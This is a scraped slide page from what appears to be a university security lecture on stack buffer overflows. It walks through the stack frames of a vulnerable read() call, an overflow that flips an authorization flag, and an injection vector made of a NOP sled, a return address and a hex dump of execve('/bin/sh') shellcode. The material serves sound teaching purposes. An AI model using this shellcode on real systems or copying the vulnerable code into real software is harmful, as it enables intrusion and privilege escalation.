part ii let s make it real memory layout of a process in
play

Part II Lets make it real Memory Layout of a Process In reality - PowerPoint PPT Presentation

Feb 06, 2024 •251 likes •582 views

Part II Lets make it real Memory Layout of a Process In reality Addresses are written in hexadecimal: For instance, consider the assembly code for IE(): 0x08048428 <+0>: push %ebp 0x08048429 <+1>: mov %esp,%ebp

  2. Part II Let’s make it real

  3. Memory Layout of a Process

  4. In reality • Addresses are written in hexadecimal: For instance, consider the assembly code for IE(): 0x08048428 <+0>: push %ebp 0x08048429 <+1>: mov %esp,%ebp 0x0804842b <+3>: call 0x8048404 <getURL> 0x08048430 <+8>: pop %ebp 0x08048431 <+9>: ret

  5. In reality • Addresses are written in hexadecimal: For instance, consider the assembly code for IE(): 0x08048428 <+0>: push %ebp 0x08048429 <+1>: mov %esp,%ebp 0x0804842b <+3>: call 0x8048404 <getURL> 0x08048430 <+8>: pop %ebp 0x08048431 <+9>: ret

  6. In reality • Addresses are written in hexadecimal: For instance, consider the assembly code for IE(): 0x08048428 <+0>: push %ebp 0x08048429 <+1>: mov %esp,%ebp 0x0804842b <+3>: call 0x8048404 <getURL> 0x08048430 <+8>: pop %ebp 0x08048431 <+9>: ret

  7. In reality • Addresses are written in hexadecimal: For instance, consider the assembly code for IE(): 0x08048428 <+0>: push %ebp 0x08048429 <+1>: mov %esp,%ebp 0x0804842b <+3>: call 0x8048404 <getURL> 0x08048430 <+8>: pop %ebp 0x08048431 <+9>: ret

  8. Similarly • The assembly code for getURL(): 0x08048404 <+0>: push %ebp 0x08048405 <+1>: mov %esp,%ebp 0x08048407 <+3>: sub $0x18,%esp 0x0804840a <+6>: mov 0x804a014,%eax 0x0804840f <+11>: movl $0x40,0x8(%esp) 0x08048417 <+19>: lea -0xc(%ebp),%edx 0x0804841a <+22>: mov %edx,0x4(%esp) 0x0804841e <+26>: mov %eax,(%esp) 0x08048421 <+29>: call 0x8048320 <read@plt> 0x08048426 <+34>: leave 0x08048427 <+35>: ret

  9. Similarly • The assembly code for getURL(): 0x08048404 <+0>: push %ebp 0x08048405 <+1>: mov %esp,%ebp 0x08048407 <+3>: sub $0x18,%esp 0x0804840a <+6>: mov 0x804a014,%eax 0x0804840f <+11>: movl $0x40,0x8(%esp) 0x08048417 <+19>: lea -0xc(%ebp),%edx 0x0804841a <+22>: mov %edx,0x4(%esp) 0x0804841e <+26>: mov %eax,(%esp) 0x08048421 <+29>: call 0x8048320 <read@plt> 0x08048426 <+34>: leave 0x08048427 <+35>: ret

  10. stack So we have: 1024 103 1023 old FP read (code for read) 1022 getURL () 1021 { 1020 char buf[ 40 ]; 1019 read(stdin,buf,64); 1018 0x08048431 get_webpage (buf); ret 1017 pop %ebp IE call 0x8048404 <getURL> } mov %esp,%ebp 1016 push %ebp 0x08048428 IE () 1015 { 1014 getURL (); 1013 } 64 1012 0x08048427 ret leave (buf) getURL call 0x8048320<read@plt> 1011 mov %eax,(%esp) mov %edx,0x4(%esp) lea -0xc(%ebp),%edx fd 1010 movl $0x40,0x8(%esp) mov 0x804a014,%eax sub $0x18,%esp 1009 mov %esp,%ebp 0x08048404 push %ebp 1008 1007

  11. stack So we have: 1024 103 1023 old FP read (code for read) 1022 getURL () 1021 { 1020 char buf[ 40 ]; 1019 read( stdin ,buf,64); 1018 0x08048431 get_webpage (buf); ret 1017 pop %ebp IE call 0x8048404 <getURL> } mov %esp,%ebp 1016 push %ebp 0x08048428 IE () 1015 { 1014 getURL (); 1013 } 64 1012 0x08048427 ret leave (buf) getURL call 0x8048320<read@plt> 1011 mov %eax,(%esp) mov %edx,0x4(%esp) lea -0xc(%ebp),%edx fd 1010 movl $0x40,0x8(%esp) mov 0x804a014,%eax sub $0x18,%esp 1009 mov %esp,%ebp 0x08048404 push %ebp 1008 1007

  12. What about the stack 1024 103 stack? 1023 old FP read (code for read) 1022 getURL () 1021 { 1020 char buf[40]; 1019 read(stdin,buf,64); 1018 0x08048431 get_webpage (buf); ret 1017 pop %ebp IE call 0x8048404 <getURL> } mov %esp,%ebp 1016 push %ebp 0x08048428 IE () 1015 { 1014 getURL (); 1013 } 64 1012 0x08048427 ret leave (buf) getURL call 0x8048320<read@plt> 1011 mov %eax,(%esp) mov %edx,0x4(%esp) lea -0xc(%ebp),%edx fd 1010 movl $0x40,0x8(%esp) mov 0x804a014,%eax sub $0x18,%esp 1009 mov %esp,%ebp 0x08048404 push %ebp 1008 1007

  13. 4 bytes What about the 0xbfffeedc 0x08048430 stack? old FP 0xbfffeed8 read (code for read) 0xbfffeed4 getURL () 0xbfffeed0 { 0xbfffeecc char buf[40]; 0xbfffeec8 read(stdin,buf,64); 0xbfffeec4 0x08048431 get_webpage (buf); ret 0xbfffeec0 pop %ebp IE call 0x8048404 <getURL> } mov %esp,%ebp 0xbfffeebc push %ebp 0x08048428 IE () 0xbfffeeb8 { 0xbfffeeb4 getURL (); 0xbfffeeb0 } 0xbfffeeac 64 0x08048427 ret leave (buf) 0xbfffeea8 getURL call 0x8048320<read@plt> mov %eax,(%esp) mov %edx,0x4(%esp) lea -0xc(%ebp),%edx fd 0xbfffeea4 movl $0x40,0x8(%esp) mov 0x804a014,%eax sub $0x18,%esp 0xbfffeea0 mov %esp,%ebp 0x08048404 push %ebp 0xbfffee9c 0xbfffee98

  14. And now the exploit

  15. Exploit 0xbfffeeb0 0xbfffeedc 0x08048430 0xbfffeed8 0xbfffeed4 getURL () 0xbfffeed0 { 0xbfffeecc char buf[10]; 0xbfffeec8 read(fd, buf, 64); buf 0xbfffeec4 get_webpage (buf); 0xbfffeec0 } 0xbfffeebc IE () 0xbfffeeb8 { 0xbfffeeb4 getURL (); 0xbfffeeb0 } 0xbfffeeac 0xbfffeea8 0xbfffeea4 0xbfffee98

  16. That is it, really • all we need to do is stick our program in the buffer • Easy to do: attacker controls what goes in the buffer! – and that program simply consists of a few instructions (not unlike what we saw before)

  17. But sometimes • We don’t even need to change the return address • Or execute any of our code Let’s have a look at an example, where the buffer overflow changes only data…

  18. Exploit against non control data get_medical_info() { boolean authorized = false; char name [10]; authorized = check(); read_from_network (name); if (authorized) show_medical_info (name); else printf (“ sorry, not allowed ”); }

  19. Exploit against non control data get_medical_info() { boolean authorized = false; char name [10]; authorized = check(); read_from_network (name); if (authorized) show_medical_info (name); else printf (“ sorry, not allowed ”); }

  20. Exploit against authorized=T non-control data get_medical_info() { name boolean authorized = false; char name [10]; authorized = check(); read_from_network (name); if (authorized) show_medical_info (name); else printf (“ sorry, not allowed ”); }

  21. Other return targets also possible! This is what we did before

  22. But other locations also possible If we start the program ourselves, we control the env

  23. So all the attacker needs to do… • ... is stick a program in the buffer or environment! – Easy: attacker controls what goes in the buffer! – What does such code look like?

  24. Typical injection vector address NOP shellcode of shellcode sled • Shellcode address: – the address of the memory region that contains the shellcode • Shellcode: – a sequence of machine instructions to be executed (e.g. execve("/bin/sh")) • NOP sled: – a sequence of do-nothing instructions (nop). It is used to ease the exploitation: attacker can jump anywhere inside, and will eventually reach the shellcode (optional)

  25. How do you create the vector? setreuid 1. Create the shellcode 2. Prepend the NOP sled: perl -e 'print "\x90"' | ndisasm -b 32 – 00000000 90 nop 3. Add the address 0xbfffeeb0 execve 00000000 31 C0 B0 46 31 DB 31 C9 1..F1.1. 00000008 CD 80 EB 16 5B 31 C0 88 ....[1.. 00000010 43 07 89 5B 08 89 43 0C C..[..C. 00000018 B0 0B 8D 4B 08 8D 53 0C ...K..S. 00000020 CD 80 E8 E5 FF FF FF 2F ......./ why this? 00000028 62 69 6E 2F 73 68 4E 41 bin/shNA 00000030 41 41 41 42 42 42 42 00 AAABBBB.

  26. In reality, things are more complicated encoded unpacker shellcode • why do you think encoding is so frequently used? – think strcpy(), etc.

  27. In reality, things are more complicated encoded unpacker shellcode • why do you think encoding is so frequently used? – think strcpy(), etc. A: if strcpy() is used to overflow the buffer, it will stop when it encounters the null byte. So if the shellcode contains a null byte, the attacker has a problem. So the attacker may have to encode the shellcode to remove null bytes and then generate them dynamically

  28. Exploit against authorized = F non control data get_medical_info() { name boolean authorized = false; char name [10]; authorized = check(); read_from_network (name); if (authorized) show_medical_info (name); else printf (“ sorry, not allowed ”); }

  29. That is, fundamentally, it. • Let us see whether we understood this.

  30. Can you exploit this?

  31. Can you exploit this? without comments w

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Dynamic Memory Management 333 Dynamic Memory Management Process Memory Layout Process Memory

Dynamic Memory Management 333 Dynamic Memory Management Process Memory Layout Process Memory

Dynamic Memory Management Dynamic Memory Management 333 Dynamic Memory Management Process Memory Layout Process Memory Layout (1) Each Linux process runs within its own virtual address space tables and the MMU (if available) security due to

1.25k views • 68 slides
Process Layout and Function Calls CS 161 Spring 2017 1 / 8 Process Layout in Memory

Process Layout and Function Calls CS 161 Spring 2017 1 / 8 Process Layout in Memory

Process Layout and Function Calls CS 161 Spring 2017 1 / 8 Process Layout in Memory 0xc0000000 Stack Stack high address grows towards decreasing addresses. dynamic is initialized at run-time . growth Heap grow

440 views • 30 slides
Process Layout and Function Calls CS 161 Spring 2016 January 25, 2016 1 / 7 Process Layout

Process Layout and Function Calls CS 161 Spring 2016 January 25, 2016 1 / 7 Process Layout

Process Layout and Function Calls CS 161 Spring 2016 January 25, 2016 1 / 7 Process Layout in Memory 0xc0000000 Stack Stack high address grows towards decreasing addresses. dynamic is initialized at run-time . growth

610 views • 29 slides
Buffer Overrun Review Process Layout in Memory IA-32

Buffer Overrun Review Process Layout in Memory IA-32

Buffer Overrun Review Process Layout in Memory IA-32 Nota=on Format : inst src dst registers prefixed with a %, constants with $

756 views • 31 slides
Welcome to Part 3: Memory Systems and I/O Weve already seen how to make a fast processor.

Welcome to Part 3: Memory Systems and I/O Weve already seen how to make a fast processor.

Welcome to Part 3: Memory Systems and I/O Weve already seen how to make a fast processor. How can we supply the CPU with enough data to keep it busy? We will now focus on memory issues, which are frequently bottlenecks that limit the

513 views • 27 slides
virtual memory 2 1 xv6 memory layout 0x80000000 (KERNBASE) page tables store this mapping (one

virtual memory 2 1 xv6 memory layout 0x80000000 (KERNBASE) page tables store this mapping (one

virtual memory 2 1 xv6 memory layout 0x80000000 (KERNBASE) page tables store this mapping (one kernel, one user) for user memory two virtual address same in every process = PA VA 0x8000000 + kernel-only memory 2 Virtual 4 Gig Device

1.7k views • 122 slides
Memory Layout for Process Stack Data Code 0 CS 140 Lecture Notes: Linkers Slide 1

Memory Layout for Process Stack Data Code 0 CS 140 Lecture Notes: Linkers Slide 1

Memory Layout for Process Stack Data Code 0 CS 140 Lecture Notes: Linkers Slide 1 Creating a Process Source Assembly Object Executable Code Code File 10101010 10101010 10101010 10101010 10101010 10101010 x.c cc x.s as

250 views • 8 slides
Review: Stack Frame CS451 16 Spring Process memory layout Stack is used to store data

Review: Stack Frame CS451 16 Spring Process memory layout Stack is used to store data

Review: Stack Frame CS451 16 Spring Process memory layout Stack is used to store data associated stack with function calls Data stores static data where values can change. data segment On top of it, dynamic data is allocated with malloc()

328 views • 20 slides
CS/EE 6710 Introduction to Layout Inverter Layout Example Layout Design Rules Composite Layout

CS/EE 6710 Introduction to Layout Inverter Layout Example Layout Design Rules Composite Layout

CS/EE 6710 Introduction to Layout Inverter Layout Example Layout Design Rules Composite Layout Drawing the mask layers that will be used by the fabrication folks to make the devices Very different from schematics In schematics

486 views • 24 slides
Memory II. Memory improvement III. Problems with memory 3 systems/stages of Memory: memory

Memory II. Memory improvement III. Problems with memory 3 systems/stages of Memory: memory

Main Focus I. Memory as a process Memory II. Memory improvement III. Problems with memory 3 systems/stages of Memory: memory the process by which I. Sensory Memory information is - acquired, II. Short -Term Memory - stored,

169 views • 5 slides
CSS Flexbox Layout Joan Boone jpboone@email.unc.edu Slide 1 Topics Part 1: Flexbox Layout

CSS Flexbox Layout Joan Boone jpboone@email.unc.edu Slide 1 Topics Part 1: Flexbox Layout

INLS 572 Web Development CSS Flexbox Layout Joan Boone jpboone@email.unc.edu Slide 1 Topics Part 1: Flexbox Layout Overview Part 2: Examples: 2-3 column layouts Part 3: Flexbox for Navigation Part 4: Examples: Centering Content, Media

888 views • 31 slides
CSS Grid Layout Joan Boone jpboone@email.unc.edu Slide 1 Topics Part 1: Grid Layout Overview

CSS Grid Layout Joan Boone jpboone@email.unc.edu Slide 1 Topics Part 1: Grid Layout Overview

INLS 572 Web Development CSS Grid Layout Joan Boone jpboone@email.unc.edu Slide 1 Topics Part 1: Grid Layout Overview Part 2: Grid Examples using Template Areas Part 3: Null Cells and Broken Grids Part 4: Sizing Grid Columns and Rows Slide

398 views • 24 slides
CS 105 x86-64 Linux Memory Layout x86-64 Linux Memory Layout Tour of Black Holes of Computing

CS 105 x86-64 Linux Memory Layout x86-64 Linux Memory Layout Tour of Black Holes of Computing

CS 105 x86-64 Linux Memory Layout x86-64 Linux Memory Layout Tour of Black Holes of Computing 00007FFFFFFFFFFF Stack

197 views • 8 slides
Memory Management Chester Rebeiro IIT Madras Memory map of process 1 Process 1 Memory map of

Memory Management Chester Rebeiro IIT Madras Memory map of process 1 Process 1 Memory map of

Memory Management Chester Rebeiro IIT Madras Memory map of process 1 Process 1 Memory map of process 2 Process 2 Sharing RAM Memory map of process 3 Process 3 Memory map of process 4 Process 4 2 x86 address translation Physical Address

1.42k views • 63 slides
Building Blocks CPUs, Memory and Accelerators Outline Computer layout CPU and Memory

Building Blocks CPUs, Memory and Accelerators Outline Computer layout CPU and Memory

Building Blocks CPUs, Memory and Accelerators Outline Computer layout CPU and Memory What does performance depend on? Limits to performance Silicon-level parallelism Single Instruction Multiple Data (SIMD/Vector)

406 views • 25 slides
Memory Layout, File I/O Bryce Boe 2013/06/27 CS24, Summer

Memory Layout, File I/O Bryce Boe 2013/06/27 CS24, Summer

Memory Layout, File I/O Bryce Boe 2013/06/27 CS24, Summer 2013 C Outline Review HW1 (+command line arguments) Memory Layout File I/O HW1

343 views • 30 slides
Vulnerabilities in C/C++ programs Part I TDDC90 Software Security Ulf Kargn Department

Vulnerabilities in C/C++ programs Part I TDDC90 Software Security Ulf Kargn Department

Vulnerabilities in C/C++ programs Part I TDDC90 Software Security Ulf Kargn Department of Computer and Information Science (IDA) Division for Database and Information Techniques (ADIT) Vulnerabilities in C-based languages

633 views • 59 slides
PWNING 101 - p.1 spritzers - CTF team spritz.math.unipd.it/spritzers.html Disclaimer All

PWNING 101 - p.1 spritzers - CTF team spritz.math.unipd.it/spritzers.html Disclaimer All

PWNING 101 - p.1 spritzers - CTF team spritz.math.unipd.it/spritzers.html Disclaimer All information presented here has the only purpose to teach how vulnerabilities work. Use them to win CTFs and to build secure systems. Do not hack your

957 views • 50 slides
ECE590 Computer and Information Security Fall 2018 Buffer Overflows and Software Security Tyler

ECE590 Computer and Information Security Fall 2018 Buffer Overflows and Software Security Tyler

ECE590 Computer and Information Security Fall 2018 Buffer Overflows and Software Security Tyler Bletsch Duke University What is a Buffer Overflow? Intent Arbitrary code execution Spawn a remote shell or infect with worm/virus

1.26k views • 76 slides
Buffer Overflow Attack Outline Understanding of Stack Layout Vulnerable code

Buffer Overflow Attack Outline Understanding of Stack Layout Vulnerable code

Buffer Overflow Attack Outline Understanding of Stack Layout Vulnerable code Challenges in exploitation Shellcode Countermeasures Program Memory Stack a,b, ptr ptr points to the memory here y x Order of the function

368 views • 36 slides
Lecture 05 Integer overflow Stephen Checkoway University of Illinois at Chicago Unsafe

Lecture 05 Integer overflow Stephen Checkoway University of Illinois at Chicago Unsafe

Lecture 05 Integer overflow Stephen Checkoway University of Illinois at Chicago Unsafe functions in libc strcpy strcat gets scanf family (fscanf, sscanf, etc.) (rare) printf family (more about these later) memcpy (need

573 views • 18 slides
CS 241 Data Organization Buffer Overflows December 4, 2018 The Problem Exploitation Use

CS 241 Data Organization Buffer Overflows December 4, 2018 The Problem Exploitation Use

CS 241 Data Organization Buffer Overflows December 4, 2018 The Problem Exploitation Use large strings (or other datatypes) to overflow a buffer Craft input to make the server do whatever you want Easy to crash a program Harder

256 views • 11 slides
Secure Software Programming and Vulnerability Analysis Christopher Kruegel

Secure Software Programming and Vulnerability Analysis Christopher Kruegel

Automation Systems Group Secure Software Programming and Vulnerability Analysis Christopher Kruegel chris@auto.tuwien.ac.at http://www.auto.tuwien.ac.at/~chris Automation Systems Group Buffer Overflows Secure Software Programming 2

520 views • 17 slides
SECURE PROGRAMMING A.A. 2018/2019 TERMINOLOGY System, Social and Mobile Security SECURITY FLAWS

SECURE PROGRAMMING A.A. 2018/2019 TERMINOLOGY System, Social and Mobile Security SECURITY FLAWS

SECURE PROGRAMMING A.A. 2018/2019 TERMINOLOGY System, Social and Mobile Security SECURITY FLAWS Software engineering has long been concerned with the elimination of software defects. A software defect is the encoding of a human error into

1.75k views • 156 slides

More recommend